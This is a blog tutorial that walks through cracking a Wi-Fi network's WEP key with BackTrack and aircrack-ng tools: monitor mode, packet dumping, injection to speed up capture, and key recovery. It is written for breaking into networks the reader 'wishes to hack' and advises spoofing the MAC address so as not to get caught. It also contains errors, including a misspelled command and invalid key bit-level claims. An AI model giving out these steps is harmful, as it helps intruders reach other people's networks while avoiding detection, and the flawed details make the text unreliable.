Disclaimer: This
tutorial is given for educational purposes only and that for any misuse
of this information; the blogger cannot be held liable.
GETTING BACKTRACK
BackTrack is
a slax based top rated Linux live distribution focused on penetration
testing which consists of more than 300 up to date tools along with the
ability of customizing scripts, configuring and modding kernels which
makes it a true gem and a must have for every security enthusiastic out
there. The best part – Its free and you can download it from – Remote Exploit
SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
ifconfig
This is the Linux equivalent of
ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range.
airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
airmon-ng start [Wi-Fi Card name]
You will see
another extra adaptor that is set on monitor mode, use that adaptor for
all further purposes in the following commands where – “[Wi-Fi card
name]” appears
DUMPING PACKETS
Once you
have set up all the parameters, you need to sniff and dump data packets
in order to get the key. You can do so by using following commands. On
the command console type these commands -
airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you
execute the command, you will see a certain number of beacons and data
packets that will be stored in the filename you have given. The file
will be stored in the root of the system drive (Click on Computer and
you will see the file).The file will be present in two formats: *.cap,
*.txt.
SPEEDING UP THINGS
However
packet dumping is quite a slow process, we need to speed up things to
save our time. Open new console after the first data packet has been
stored and type the command in the new console and execute it.
airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type
this command you will see that the data packets required for breaking
the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension]
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not
necessary that the key should have exactly the same digits as shown
above so please don’t freak out if you see a 10 digit or 14 digit key.
Also if the decryption fails, you can change the bit level of the
decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.
Cheers..
No comments:
Post a Comment